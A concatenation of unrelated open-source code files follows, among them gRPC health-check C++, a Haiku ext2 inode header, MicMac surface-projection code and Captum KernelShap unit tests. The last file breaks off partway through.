void DefaultHealthCheckService::HealthCheckServiceImpl::WatchCallHandler::
SendFinishLocked(std::shared_ptr<CallHandler> self, const Status& status) {
on_finish_done_ =
CallableTag(std::bind(&WatchCallHandler::OnFinishDone, this,
std::placeholders::_1, std::placeholders::_2),
std::move(self));
stream_.Finish(status, &on_finish_done_);
finish_called_ = true;
}
void DefaultHealthCheckService::HealthCheckServiceImpl::WatchCallHandler::
OnFinishDone(std::shared_ptr<CallHandler> self, bool ok) {
if (ok) {
gpr_log(GPR_DEBUG,
"[HCS %p] Health watch call finished (service_name: \"%s\", "
"handler: %p).",
service_, service_name_.c_str(), this);
}
self.reset(); // To appease clang-tidy.
}
// TODO(roth): This method currently assumes that there will be only one
// thread polling the cq and invoking the corresponding callbacks. If
// that changes, we will need to add synchronization here.
void DefaultHealthCheckService::HealthCheckServiceImpl::WatchCallHandler::
OnDoneNotified(std::shared_ptr<CallHandler> self, bool ok) {
GPR_ASSERT(ok);
gpr_log(GPR_DEBUG,
"[HCS %p] Health watch call is notified done (handler: %p, "
"is_cancelled: %d).",
service_, this, static_cast<int>(ctx_.IsCancelled()));
database_->UnregisterCallHandler(service_name_, self);
SendFinish(std::move(self), Status::CANCELLED);
}
} // namespace grpc
| 6,747 |
1,338 | <gh_stars>1000+
/*
* Copyright 2011, <NAME>, <EMAIL>.
* Copyright 2008, <NAME>, <EMAIL>.
* This file may be used under the terms of the MIT License.
*/
#ifndef INODE_H
#define INODE_H
#include <fs_cache.h>
#include <lock.h>
#include <string.h>
#include "ext2.h"
#include "Volume.h"
//#define TRACE_EXT2
#ifdef TRACE_EXT2
# define TRACEI(x...) dprintf("\33[34mext2:\33[0m " x)
#else
# define TRACEI(x...) ;
#endif
class Inode : public TransactionListener {
public:
Inode(Volume* volume, ino_t id);
~Inode();
status_t InitCheck();
ino_t ID() const { return fID; }
rw_lock* Lock() { return &fLock; }
void WriteLockInTransaction(Transaction& transaction);
status_t UpdateNodeFromDisk();
status_t WriteBack(Transaction& transaction);
recursive_lock& SmallDataLock() { return fSmallDataLock; }
bool IsDirectory() const
{ return S_ISDIR(Mode()); }
bool IsFile() const
{ return S_ISREG(Mode()); }
bool IsSymLink() const
{ return S_ISLNK(Mode()); }
status_t CheckPermissions(int accessMode) const;
bool IsDeleted() const { return fUnlinked; }
bool HasExtraAttributes() const
{ return fHasExtraAttributes; }
bool IsIndexed() const
{ return fVolume->IndexedDirectories()
&& (Flags() & EXT2_INODE_INDEXED) != 0; }
mode_t Mode() const { return fNode.Mode(); }
int32 Flags() const { return fNode.Flags(); }
off_t Size() const { return fNode.Size(); }
void GetChangeTime(struct timespec *timespec) const
{ fNode.GetChangeTime(timespec, fHasExtraAttributes); }
void GetModificationTime(struct timespec *timespec) const
{ fNode.GetModificationTime(timespec,
fHasExtraAttributes); }
void GetCreationTime(struct timespec *timespec) const
{ fNode.GetCreationTime(timespec,
fHasExtraAttributes); }
void GetAccessTime(struct timespec *timespec) const
{ fNode.GetAccessTime(timespec, fHasExtraAttributes); }
void SetChangeTime(const struct timespec *timespec)
{ fNode.SetChangeTime(timespec, fHasExtraAttributes); }
void SetModificationTime(const struct timespec *timespec)
{ fNode.SetModificationTime(timespec,
fHasExtraAttributes); }
void SetCreationTime(const struct timespec *timespec)
{ fNode.SetCreationTime(timespec,
fHasExtraAttributes); }
void SetAccessTime(const struct timespec *timespec)
{ fNode.SetAccessTime(timespec, fHasExtraAttributes); }
void IncrementNumLinks(Transaction& transaction);
//::Volume* _Volume() const { return fVolume; }
Volume* GetVolume() const { return fVolume; }
status_t FindBlock(off_t offset, fsblock_t& block,
uint32 *_count = NULL);
status_t ReadAt(off_t pos, uint8 *buffer, size_t *length);
status_t WriteAt(Transaction& transaction, off_t pos,
const uint8* buffer, size_t* length);
status_t FillGapWithZeros(off_t start, off_t end);
status_t Resize(Transaction& transaction, off_t size);
ext2_inode& Node() { return fNode; }
status_t InitDirectory(Transaction& transaction, Inode* parent);
status_t Unlink(Transaction& transaction);
static status_t Create(Transaction& transaction, Inode* parent,
const char* name, int32 mode, int openMode,
uint8 type, bool* _created = NULL,
ino_t* _id = NULL, Inode** _inode = NULL,
fs_vnode_ops* vnodeOps = NULL,
uint32 publishFlags = 0);
static void _BigtimeToTimespec(bigtime_t time,
struct timespec *timespec)
{ timespec->tv_sec = time / 1000000LL;
timespec->tv_nsec = (time % 1000000LL) * 1000; }
void* FileCache() const { return fCache; }
void* Map() const { return fMap; }
status_t CreateFileCache();
void DeleteFileCache();
bool HasFileCache() { return fCache != NULL; }
status_t EnableFileCache();
status_t DisableFileCache();
status_t Sync();
void SetDirEntryChecksum(uint8* block, uint32 id, uint32 gen);
void SetDirEntryChecksum(uint8* block);
void SetExtentChecksum(ext2_extent_stream* stream);
bool VerifyExtentChecksum(ext2_extent_stream* stream);
protected:
virtual void TransactionDone(bool success);
virtual void RemovedFromTransaction();
private:
Inode(Volume* volume);
Inode(const Inode&);
Inode &operator=(const Inode&);
// no implementation
status_t _EnlargeDataStream(Transaction& transaction,
off_t size);
status_t _ShrinkDataStream(Transaction& transaction,
off_t size);
uint64 _NumBlocks();
status_t _SetNumBlocks(uint64 numBlocks);
uint32 _InodeChecksum(ext2_inode* inode);
ext2_dir_entry_tail* _DirEntryTail(uint8* block) const;
uint32 _DirEntryChecksum(uint8* block, uint32 id,
uint32 gen) const;
uint32 _ExtentLength(ext2_extent_stream* stream) const;
uint32 _ExtentChecksum(ext2_extent_stream* stream) const;
rw_lock fLock;
::Volume* fVolume;
ino_t fID;
void* fCache;
void* fMap;
bool fUnlinked;
bool fHasExtraAttributes;
ext2_inode fNode;
uint32 fNodeSize;
// Inodes have a variable size, but the important
// information is always the same size (except in ext4)
status_t fInitStatus;
mutable recursive_lock fSmallDataLock;
};
// The Vnode class provides a convenience layer upon get_vnode(), so that
// you don't have to call put_vnode() anymore, which may make code more
// readable in some cases
class Vnode {
public:
Vnode(Volume* volume, ino_t id)
:
fInode(NULL)
{
SetTo(volume, id);
}
Vnode()
:
fStatus(B_NO_INIT),
fInode(NULL)
{
}
~Vnode()
{
Unset();
}
status_t InitCheck()
{
return fStatus;
}
void Unset()
{
if (fInode != NULL) {
put_vnode(fInode->GetVolume()->FSVolume(), fInode->ID());
fInode = NULL;
fStatus = B_NO_INIT;
}
}
status_t SetTo(Volume* volume, ino_t id)
{
Unset();
return fStatus = get_vnode(volume->FSVolume(), id, (void**)&fInode);
}
status_t Get(Inode** _inode)
{
*_inode = fInode;
return fStatus;
}
void Keep()
{
TRACEI("Vnode::Keep()\n");
fInode = NULL;
}
status_t Publish(Transaction& transaction, Inode* inode,
fs_vnode_ops* vnodeOps, uint32 publishFlags)
{
TRACEI("Vnode::Publish()\n");
Volume* volume = transaction.GetVolume();
status_t status = B_OK;
if (!inode->IsSymLink() && volume->ID() >= 0) {
TRACEI("Vnode::Publish(): Publishing volume: %p, %" B_PRIdINO
", %p, %p, %" B_PRIu16 ", %" B_PRIx32 "\n", volume->FSVolume(),
inode->ID(), inode, vnodeOps != NULL ? vnodeOps : &gExt2VnodeOps,
inode->Mode(), publishFlags);
status = publish_vnode(volume->FSVolume(), inode->ID(), inode,
vnodeOps != NULL ? vnodeOps : &gExt2VnodeOps, inode->Mode(),
publishFlags);
TRACEI("Vnode::Publish(): Result: %s\n", strerror(status));
}
if (status == B_OK) {
TRACEI("Vnode::Publish(): Preparing internal data\n");
fInode = inode;
fStatus = B_OK;
cache_add_transaction_listener(volume->BlockCache(),
transaction.ID(), TRANSACTION_ABORTED, &_TransactionListener,
inode);
}
return status;
}
private:
status_t fStatus;
Inode* fInode;
// TODO: How to apply coding style here?
static void _TransactionListener(int32 id, int32 event, void* _inode)
{
Inode* inode = (Inode*)_inode;
if (event == TRANSACTION_ABORTED) {
// TODO: Unpublish?
panic("Transaction %d aborted, inode %p still exists!\n", (int)id,
inode);
}
}
};
#endif // INODE_H
| 3,112 |
897 | <filename>C/math/Noble_Integer.c
/*An integer x is said to be Noble given an array
if the number of integers greater than x are equal to x.
If noble integer is not found output is -1.
*/
#include <stdio.h>
int nobleint(int *, int);
int main()
{
int num, i, k, arr[1000], arr2[1000], m;
printf("Enter the number of elements:");
scanf("%d", &num);
printf("Enter the elements:");
for (i = 0; i < num; i++)
{
scanf("%d", &arr[i]);
}
m = nobleint(arr, num);
printf("%d", m);
return 0;
}
// To find the noble integer from the given array
int nobleint(int *arr, int num)
{
int count, i, j, x = 0;
for (i = 0; i < num; i++)
{
count = 0;
for (j = 0; j < num; j++)
{
if (*(arr + i)<*(arr + j))
count = count + 1;
}
if (count == *(arr + i))
{
x = 1;
return (count);
}
}
if (x == 0)
return (-1);
}
/*
Sample Output
Enter the number of elements:4
Enter the elements:7 3 9 81
3
Enter the number of elements:3
Enter the elements:2 2 2
-1
Complexities
Time Complexity:O(n^2)
Space Complexity:O(1)
*/
| 438 |
10,225 | package io.quarkus.it.mongodb.panache.transaction;
import org.bson.codecs.pojo.annotations.BsonId;
import io.quarkus.mongodb.panache.MongoEntity;
import io.quarkus.mongodb.panache.PanacheMongoEntityBase;
@MongoEntity(database = "transaction-person")
public class TransactionPerson extends PanacheMongoEntityBase {
@BsonId
public Long id;
public String firstname;
public String lastname;
}
| 148 |
438 | <gh_stars>100-1000
#define EIGEN_USE_THREADS
#include "flow_warp.h"
#include "tensorflow/core/framework/op_kernel.h"
#include "tensorflow/core/framework/register_types.h"
#include "tensorflow/core/framework/types.h"
#include "tensorflow/core/platform/types.h"
namespace tensorflow {
typedef Eigen::GpuDevice GPUDevice;
template<typename Device>
class FlowWarpKernel : public OpKernel {
public:
explicit FlowWarpKernel(OpKernelConstruction *ctx) : OpKernel(ctx) {}
void Compute(OpKernelContext *ctx) override {
// Get the input image and flow and verify dimensions
const Tensor& input_t = ctx->input(0);
const Tensor& flow_t = ctx->input(1);
OP_REQUIRES(ctx, input_t.dims() == 4,
errors::InvalidArgument("Input image must have rank 4"));
OP_REQUIRES(ctx, flow_t.dims() == 4,
errors::InvalidArgument("Input flow must have rank 4"));
OP_REQUIRES(ctx,
input_t.dim_size(0) == flow_t.dim_size(0) && input_t.dim_size(
1) == flow_t.dim_size(1) && input_t.dim_size(2) == flow_t.dim_size(2),
errors::InvalidArgument(
"Input image and flow must have same N x H x W dimensions"));
// Allocate the memory for the output
Tensor *output_t;
OP_REQUIRES_OK(ctx, ctx->allocate_output(0, input_t.shape(), &output_t));
// Perform flow augmentation
auto input = input_t.tensor<float, 4>();
auto flow = flow_t.tensor<float, 4>();
auto output = output_t->tensor<float, 4>();
FlowWarp(ctx->eigen_gpu_device(), input, flow, output);
}
};
REGISTER_KERNEL_BUILDER(Name("FlowWarp")
.Device(DEVICE_GPU),
FlowWarpKernel<GPUDevice>)
} // end namespace tensorflow
| 808 |
930 | # Directory Tree Generator
import os
import argparse
def realname(path, root=None):
if root is not None:
path = os.path.join(root, path)
result = os.path.basename(path)
if os.path.islink(path):
realpath = os.readlink(path)
result = '%s -> %s' % (os.path.basename(path), realpath)
return result
def ptree(startpath, depth=-1):
prefix = 0
assert os.path.isdir(startpath), "Directory not valid"
if startpath != '/':
if startpath.endswith('/'):
startpath = startpath[:-1]
prefix = len(startpath)
for root, dirs, files in os.walk(startpath):
level = root[prefix:].count(os.sep)
if depth > -1 and level > depth:
continue
indent = subindent = ''
if level > 0:
indent = '| ' * (level-1) + '|-- '
subindent = '| ' * (level) + '|-- '
print('{}{}/'.format(indent, realname(root)))
for d in dirs:
if os.path.islink(os.path.join(root, d)):
print('{}{}'.format(subindent, realname(d, root=root)))
for f in files:
print('{}{}'.format(subindent, realname(f, root=root)))
if __name__ == '__main__':
print("\nDirectory tree \n")
parser = argparse.ArgumentParser(description='prints directory tree.')
parser.add_argument('startpath', type=str,
help='path to stating directory')
args = parser.parse_args()
argsd = vars(args)
ptree(**argsd)
input("\n\nPress enter to exit")
| 696 |
451 | /*Header-MicMac-eLiSe-25/06/2007
MicMac : Multi Image Correspondances par Methodes Automatiques de Correlation
eLiSe : ELements of an Image Software Environnement
www.micmac.ign.fr
Copyright : Institut Geographique National
Author : <NAME>
Contributors : <NAME>, <NAME>.
[1] <NAME>, <NAME>.
"A multiresolution and optimization-based image matching approach:
An application to surface reconstruction from SPOT5-HRS stereo imagery."
In IAPRS vol XXXVI-1/W41 in ISPRS Workshop On Topographic Mapping From Space
(With Special Emphasis on Small Satellites), Ankara, Turquie, 02-2006.
[2] <NAME>, "MicMac, un lociel de mise en correspondance
d'images, adapte au contexte geograhique" to appears in
Bulletin d'information de l'Institut Geographique National, 2007.
Francais :
MicMac est un logiciel de mise en correspondance d'image adapte
au contexte de recherche en information geographique. Il s'appuie sur
la bibliotheque de manipulation d'image eLiSe. Il est distibue sous la
licences Cecill-B. Voir en bas de fichier et http://www.cecill.info.
English :
MicMac is an open source software specialized in image matching
for research in geographic information. MicMac is built on the
eLiSe image library. MicMac is governed by the "Cecill-B licence".
See below and http://www.cecill.info.
Header-MicMac-eLiSe-25/06/2007*/
#include "StdAfx.h"
/*****************************************/
/* */
/* cSurfAnalIdent */
/* */
/*****************************************/
class cSurfAnalReperCart : public cInterfSurfaceAnalytique
{
public :
cSurfAnalReperCart (const cChCoCart & aCart) :
cInterfSurfaceAnalytique (true) ,
mCCCE2L (aCart.Inv()),
mCCCL2E (mCCCE2L.Inv())
{
}
Pt3dr E2UVL(const Pt3dr & aP) const {return mCCCE2L.FromLoc(aP);}
Pt3dr UVL2E(const Pt3dr & aP) const {return mCCCL2E.FromLoc(aP);}
void AdaptBox(Pt2dr & aP0,Pt2dr & aP1) const {}
cXmlDescriptionAnalytique Xml() const
{
ELISE_ASSERT(false,"cSurfAnalIdent::Xml");
cXmlDescriptionAnalytique aNS;
return aNS;
}
bool HasOrthoLoc() const {return false;}
std::vector<cInterSurfSegDroite> InterDroite(const ElSeg3D & aSegOri,double aZ1) const
{
ElSeg3D aSeg(E2UVL(aSegOri.PtOfAbsc(0)),E2UVL(aSegOri.PtOfAbsc(1)));
std::vector<cInterSurfSegDroite> aRes;
double aZ0 = aSeg.P0().z ;
double aDZ = aSeg.TgNormee().z;
if (aDZ==0) return aRes;
aRes.push_back
(
cInterSurfSegDroite
(
(aZ1-aZ0)/aDZ,
( aZ0 > aZ1 ) ? eSurfVI_Rent : eSurfVI_Sort
)
);
return aRes;
}
private :
cChCoCart mCCCE2L;
cChCoCart mCCCL2E;
};
cInterfSurfaceAnalytique * cInterfSurfaceAnalytique::FromCCC(const cChCoCart & aCCC)
{
cInterfSurfaceAnalytique * aRes = new cSurfAnalReperCart(aCCC);
return aRes;
}
/*****************************************/
/* */
/* cSurfAnalIdent */
/* */
/*****************************************/
class cSurfAnalIdent : public cInterfSurfaceAnalytique
{
public :
cSurfAnalIdent(double aZRef) :
cInterfSurfaceAnalytique (true) ,
mZRef (aZRef),
mVec (0,0,mZRef)
{
}
Pt3dr E2UVL(const Pt3dr & aP) const {return aP - mVec;}
Pt3dr UVL2E(const Pt3dr & aP) const {return aP + mVec;}
void AdaptBox(Pt2dr & aP0,Pt2dr & aP1) const {}
cXmlDescriptionAnalytique Xml() const
{
ELISE_ASSERT(false,"cSurfAnalIdent::Xml");
cXmlDescriptionAnalytique aNS;
return aNS;
}
bool HasOrthoLoc() const {return false;}
std::vector<cInterSurfSegDroite> InterDroite(const ElSeg3D & aSeg,double aZ1) const
{
std::vector<cInterSurfSegDroite> aRes;
double aZ0 = aSeg.P0().z -mZRef;
double aDZ = aSeg.TgNormee().z;
if (aDZ==0) return aRes;
aRes.push_back
(
cInterSurfSegDroite
(
(aZ1-aZ0)/aDZ,
( aZ0 > aZ1 ) ? eSurfVI_Rent : eSurfVI_Sort
)
);
return aRes;
}
private :
double mZRef;
Pt3dr mVec;
};
cInterfSurfaceAnalytique * cInterfSurfaceAnalytique::Identite(double aZRef)
{
static cInterfSurfaceAnalytique * aRes = new cSurfAnalIdent(aZRef);
return aRes;
}
/*****************************************/
/* */
/* cProjOrthoCylindrique */
/* */
/*****************************************/
cProjOrthoCylindrique::cProjOrthoCylindrique
(
const cChCoCart & aL2A,
const ElSeg3D & aSegAbs,
bool aAngulCorr
) :
cInterfSurfaceAnalytique (true),
mL2A (aL2A),
mA2L (mL2A.Inv()),
mSegAbs (aSegAbs),
mAngulCorr (aAngulCorr)
{
ElSeg3D aSegLoc
(
Ab2Loc(aSegAbs.PtOfAbsc(0)),
Ab2Loc(aSegAbs.PtOfAbsc(1))
);
mDist = ElAbs(aSegLoc.P0().z);
Pt3dr aTg = aSegLoc.TgNormee();
if (aTg.x <0)
aTg = - aTg;
mB = aTg.y / aTg.x;
mC = aTg.z / aTg.x;
}
Pt3dr cProjOrthoCylindrique::Loc2Abs(const Pt3dr & aP) const
{
return mL2A.FromLoc(aP);
}
Pt3dr cProjOrthoCylindrique::Ab2Loc(const Pt3dr & aP) const
{
return mA2L.FromLoc(aP);
}
Pt3dr cProjOrthoCylindrique::Loc2Cyl(const Pt3dr & aP) const
{
if (mUnUseAnamXCSte) return aP;
// std::cout << "L2 C" << aP.y << " " << (aP.z-mD) << " " << (aP.y/(aP.z-mD)) << " " << atan2(aP.y,aP.z-mD) << "\n";
double A = aP.y -mB * aP.x;
double B = mDist + mC * aP.x - aP.z;
double aV = (mAngulCorr ? atan2(A,B): (A/B)) ;
return Pt3dr(aP.x,mDist * aV,aP.z);
}
Pt3dr cProjOrthoCylindrique::Cyl2Loc(const Pt3dr & aP) const
{
if (mUnUseAnamXCSte) return aP;
double aV = aP.y / mDist;
if (mAngulCorr)
aV = tan(aV);
return Pt3dr
(
aP.x,
mB * aP.x + aV*(mDist +mC * aP.x -aP.z),
aP.z
);
// return Pt3dr(aP.x,aP.y*(aP.z-mD)/mD,aP.z);
}
Pt3dr cProjOrthoCylindrique::E2UVL(const Pt3dr & aP) const
{
return Loc2Cyl(Ab2Loc(aP));
}
Pt3dr cProjOrthoCylindrique::UVL2E(const Pt3dr & aP) const
{
return Loc2Abs(Cyl2Loc(aP));
}
bool cProjOrthoCylindrique::HasOrthoLoc() const
{
return true;
}
Pt3dr cProjOrthoCylindrique::ToOrLoc(const Pt3dr & aP) const
{
return Cyl2Loc(aP);
}
Pt3dr cProjOrthoCylindrique::FromOrLoc(const Pt3dr & aP) const
{
return Loc2Cyl(aP);
}
bool cProjOrthoCylindrique::OrthoLocIsXCste() const
{
return true;
}
bool cProjOrthoCylindrique::IsAnamXCsteOfCart() const { return true; }
// Pt3dr FromOrLoc(const Pt3dr & aP) const ; // Def Err fatale
std::vector<cInterSurfSegDroite> cProjOrthoCylindrique::InterDroite(const ElSeg3D & aSeg0,double aZ1) const
{
ElSeg3D aSeg(Ab2Loc(aSeg0.PtOfAbsc(0)),Ab2Loc(aSeg0.PtOfAbsc(1)));
std::vector<cInterSurfSegDroite> aRes;
double aZ0 = aSeg.P0().z;
double aDZ = aSeg.TgNormee().z;
if (aDZ==0) return aRes;
aRes.push_back
(
cInterSurfSegDroite
(
(aZ1-aZ0)/aDZ,
( aZ0 > aZ1 ) ? eSurfVI_Rent : eSurfVI_Sort
)
);
return aRes;
}
void cProjOrthoCylindrique::AdaptBox(Pt2dr & aP0,Pt2dr & aP1) const
{
}
cXmlOrthoCyl cProjOrthoCylindrique::XmlOCyl() const
{
cXmlOrthoCyl aRes;
aRes.Repere() = mL2A.El2Xml();
aRes.P0() = mSegAbs.P0();
aRes.P1() = mSegAbs.P1();
aRes.AngulCorr() = mAngulCorr;
return aRes;
}
cXmlDescriptionAnalytique cProjOrthoCylindrique::Xml() const
{
cXmlDescriptionAnalytique aRes;
aRes.OrthoCyl().SetVal(XmlOCyl());
return aRes;
}
#define NS_SuperposeImage
cProjOrthoCylindrique cProjOrthoCylindrique::FromXml
(
const cXmlOneSurfaceAnalytique&,
const NS_SuperposeImage::cXmlOrthoCyl& anOC
)
{
cProjOrthoCylindrique aRes
(
cChCoCart::Xml2El(anOC.Repere()),
ElSeg3D(anOC.P0(),anOC.P1()),
anOC.AngulCorr()
);
/*
cProjOrthoCylindrique aCAng
(
anOC.Repere().Ori(),
anOC.Repere().Ox(),
anOC.Repere().Oy(),
anOC.Repere().Oz(),
anOC.Dist(),
true
);
cProjOrthoCylindrique aCOr
(
anOC.Repere().Ori(),
anOC.Repere().Ox(),
anOC.Repere().Oy(),
anOC.Repere().Oz(),
anOC.Dist(),
false
);
while (1)
{
std::cout << "AAAAA \n";
Pt3dr aP;
std::cin >> aP.x >> aP.y >> aP.z;
Pt3dr aQA = aCAng.UVL2E(aP);
Pt3dr aRA = aCAng.E2UVL(aQA);
Pt3dr aQO = aCOr.UVL2E(aP);
Pt3dr aRO = aCOr.E2UVL(aQO);
std::cout << aP << aRA << " ;; " << aQA << "\n";
std::cout << aP << aRO << " ;; " << aQO << "\n";
}
*/
return aRes;
}
/*
*/
/*Footer-MicMac-eLiSe-25/06/2007
Ce logiciel est un programme informatique servant à la mise en
correspondances d'images pour la reconstruction du relief.
Ce logiciel est régi par la licence CeCILL-B soumise au droit français et
respectant les principes de diffusion des logiciels libres. Vous pouvez
utiliser, modifier et/ou redistribuer ce programme sous les conditions
de la licence CeCILL-B telle que diffusée par le CEA, le CNRS et l'INRIA
sur le site "http://www.cecill.info".
En contrepartie de l'accessibilité au code source et des droits de copie,
de modification et de redistribution accordés par cette licence, il n'est
offert aux utilisateurs qu'une garantie limitée. Pour les mêmes raisons,
seule une responsabilité restreinte pèse sur l'auteur du programme, le
titulaire des droits patrimoniaux et les concédants successifs.
A cet égard l'attention de l'utilisateur est attirée sur les risques
associés au chargement, à l'utilisation, à la modification et/ou au
développement et à la reproduction du logiciel par l'utilisateur étant
donné sa spécificité de logiciel libre, qui peut le rendre complexe à
manipuler et qui le réserve donc à des développeurs et des professionnels
avertis possédant des connaissances informatiques approfondies. Les
utilisateurs sont donc invités à charger et tester l'adéquation du
logiciel à leurs besoins dans des conditions permettant d'assurer la
sécurité de leurs systèmes et ou de leurs données et, plus généralement,
à l'utiliser et l'exploiter dans les mêmes conditions de sécurité.
Le fait que vous puissiez accéder à cet en-tête signifie que vous avez
pris connaissance de la licence CeCILL-B, et que vous en avez accepté les
termes.
Footer-MicMac-eLiSe-25/06/2007*/
| 6,138 |
3,140 | <filename>tests/attr/test_kernel_shap.py
#!/usr/bin/env python3
import io
import unittest
import unittest.mock
from typing import Any, Callable, List, Tuple, Union
import torch
from captum._utils.typing import BaselineType, TensorOrTupleOfTensorsGeneric
from captum.attr._core.kernel_shap import KernelShap
from tests.helpers.basic import (
BaseTest,
assertTensorAlmostEqual,
assertTensorTuplesAlmostEqual,
)
from tests.helpers.basic_models import (
BasicModel_MultiLayer,
BasicModel_MultiLayer_MultiInput,
)
class Test(BaseTest):
def setUp(self) -> None:
super().setUp()
try:
import sklearn # noqa: F401
assert (
sklearn.__version__ >= "0.23.0"
), "Must have sklearn version 0.23.0 or higher"
except (ImportError, AssertionError):
raise unittest.SkipTest("Skipping KernelShap tests, sklearn not available.")
def test_linear_kernel_shap(self) -> None:
net = BasicModel_MultiLayer()
inp = torch.tensor([[20.0, 50.0, 30.0]], requires_grad=True)
baseline = torch.tensor([[10.0, 20.0, 10.0]], requires_grad=True)
self._kernel_shap_test_assert(
net,
inp,
[40.0, 120.0, 80.0],
n_samples=500,
baselines=baseline,
expected_coefs=[40.0, 120.0, 80.0],
)
def test_simple_kernel_shap(self) -> None:
net = BasicModel_MultiLayer()
inp = torch.tensor([[20.0, 50.0, 30.0]], requires_grad=True)
self._kernel_shap_test_assert(
net,
inp,
[76.66666, 196.66666, 116.66666],
perturbations_per_eval=(1, 2, 3),
n_samples=500,
)
def test_simple_kernel_shap_with_mask(self) -> None:
net = BasicModel_MultiLayer()
inp = torch.tensor([[20.0, 50.0, 30.0]], requires_grad=True)
self._kernel_shap_test_assert(
net,
inp,
[275.0, 275.0, 115.0],
feature_mask=torch.tensor([[0, 0, 1]]),
perturbations_per_eval=(1, 2, 3),
expected_coefs=[275.0, 115.0],
)
@unittest.mock.patch("sys.stderr", new_callable=io.StringIO)
def test_simple_kernel_shap_with_show_progress(self, mock_stderr) -> None:
net = BasicModel_MultiLayer()
inp = torch.tensor([[20.0, 50.0, 30.0]], requires_grad=True)
# test progress output for each batch size
for bsz in (1, 2, 3):
self._kernel_shap_test_assert(
net,
inp,
[76.66666, 196.66666, 116.66666],
perturbations_per_eval=(bsz,),
n_samples=500,
show_progress=True,
)
output = mock_stderr.getvalue()
# to test if progress calculation aligns with the actual iteration
# all perturbations_per_eval should reach progress of 100%
assert (
"Kernel Shap attribution: 100%" in output
), f"Error progress output: {repr(output)}"
mock_stderr.seek(0)
mock_stderr.truncate(0)
def test_simple_kernel_shap_with_baselines(self) -> None:
net = BasicModel_MultiLayer()
inp = torch.tensor([[20.0, 50.0, 30.0]])
self._kernel_shap_test_assert(
net,
inp,
[248.0, 248.0, 104.0],
feature_mask=torch.tensor([[0, 0, 1]]),
baselines=4,
perturbations_per_eval=(1, 2, 3),
)
def test_simple_batch_kernel_shap(self) -> None:
net = BasicModel_MultiLayer()
inp = torch.tensor([[2.0, 10.0, 3.0], [20.0, 50.0, 30.0]], requires_grad=True)
self._kernel_shap_test_assert(
net,
inp,
[[7.0, 32.5, 10.5], [76.66666, 196.66666, 116.66666]],
perturbations_per_eval=(1, 2, 3),
n_samples=20000,
)
def test_simple_batch_kernel_shap_with_mask(self) -> None:
net = BasicModel_MultiLayer()
inp = torch.tensor([[2.0, 10.0, 3.0], [20.0, 50.0, 30.0]], requires_grad=True)
self._kernel_shap_test_assert(
net,
inp,
[[39.5, 39.5, 10.5], [275.0, 275.0, 115.0]],
feature_mask=torch.tensor([[0, 0, 1], [1, 1, 0]]),
perturbations_per_eval=(1, 2, 3),
n_samples=100,
expected_coefs=[[39.5, 10.5], [115.0, 275.0]],
)
def test_multi_input_kernel_shap_without_mask(self) -> None:
net = BasicModel_MultiLayer_MultiInput()
inp1 = torch.tensor([[23.0, 0.0, 0.0]])
inp2 = torch.tensor([[20.0, 0.0, 50.0]])
inp3 = torch.tensor([[0.0, 100.0, 10.0]])
expected = (
[[90, 0, 0]],
[[78, 0, 198]],
[[0, 398, 38]],
)
self._kernel_shap_test_assert(
net,
(inp1, inp2, inp3),
expected,
additional_input=(1,),
n_samples=2000,
)
def test_multi_input_kernel_shap_with_mask(self) -> None:
net = BasicModel_MultiLayer_MultiInput()
inp1 = torch.tensor([[20.0, 50.0, 30.0]])
inp2 = torch.tensor([[0.0, 100.0, 0.0]])
inp3 = torch.tensor([[2.0, 10.0, 3.0]])
mask1 = torch.tensor([[0, 1, 0]])
mask2 = torch.tensor([[0, 1, 2]])
mask3 = torch.tensor([[0, 0, 0]])
expected = (
[[255.0, 595.0, 255.0]],
[[255.0, 595.0, 0.0]],
[[255.0, 255.0, 255.0]],
)
self._kernel_shap_test_assert(
net,
(inp1, inp2, inp3),
expected,
additional_input=(1,),
feature_mask=(mask1, mask2, mask3),
)
expected_with_baseline = (
[[184, 580.0, 184]],
[[184, 580.0, -12.0]],
[[184, 184, 184]],
)
self._kernel_shap_test_assert(
net,
(inp1, inp2, inp3),
expected_with_baseline,
additional_input=(1,),
feature_mask=(mask1, mask2, mask3),
baselines=(2, 3.0, 4),
perturbations_per_eval=(1, 2, 3),
)
def test_multi_input_batch_kernel_shap_without_mask(self) -> None:
net = BasicModel_MultiLayer_MultiInput()
inp1 = torch.tensor([[23.0, 0.0, 0.0], [20.0, 50.0, 30.0]])
inp2 = torch.tensor([[20.0, 0.0, 50.0], [0.0, 100.0, 0.0]])
inp3 = torch.tensor([[0.0, 100.0, 10.0], [0.0, 10.0, 0.0]])
expected = (
[[90, 0, 0], [78.0, 198.0, 118.0]],
[[78, 0, 198], [0.0, 398.0, 0.0]],
[[0, 398, 38], [0.0, 38.0, 0.0]],
)
self._kernel_shap_test_assert(
net,
(inp1, inp2, inp3),
expected,
additional_input=(1,),
n_samples=2500,
expected_coefs=[
[90.0, 0, 0, 78, 0, 198, 0, 398, 38],
[78.0, 198.0, 118.0, 0.0, 398.0, 0.0, 0.0, 38.0, 0.0],
],
)
def test_multi_input_batch_kernel_shap(self) -> None:
net = BasicModel_MultiLayer_MultiInput()
inp1 = torch.tensor([[23.0, 100.0, 0.0], [20.0, 50.0, 30.0]])
inp2 = torch.tensor([[20.0, 50.0, 30.0], [0.0, 100.0, 0.0]])
inp3 = torch.tensor([[0.0, 100.0, 10.0], [2.0, 10.0, 3.0]])
mask1 = torch.tensor([[1, 1, 1], [0, 1, 0]])
mask2 = torch.tensor([[0, 1, 2]])
mask3 = torch.tensor([[0, 1, 2], [0, 0, 0]])
expected = (
[[1088.6666, 1088.6666, 1088.6666], [255.0, 595.0, 255.0]],
[[76.6666, 1088.6666, 156.6666], [255.0, 595.0, 0.0]],
[[76.6666, 1088.6666, 156.6666], [255.0, 255.0, 255.0]],
)
self._kernel_shap_test_assert(
net,
(inp1, inp2, inp3),
expected,
additional_input=(1,),
feature_mask=(mask1, mask2, mask3),
n_samples=300,
)
expected_with_baseline = (
[[1040, 1040, 1040], [184, 580.0, 184]],
[[52, 1040, 132], [184, 580.0, -12.0]],
[[52, 1040, 132], [184, 184, 184]],
)
self._kernel_shap_test_assert(
net,
(inp1, inp2, inp3),
expected_with_baseline,
additional_input=(1,),
feature_mask=(mask1, mask2, mask3),
baselines=(2, 3.0, 4),
perturbations_per_eval=(1, 2, 3),
)
# Remaining tests are for cases where forward function returns a scalar
# as either a float, integer, 0d tensor or 1d tensor.
def test_single_kernel_shap_scalar_float(self) -> None:
net = BasicModel_MultiLayer()
self._single_input_scalar_kernel_shap_assert(
lambda inp: torch.sum(net(inp)).item()
)
def test_single_kernel_shap_scalar_tensor_0d(self) -> None:
net = BasicModel_MultiLayer()
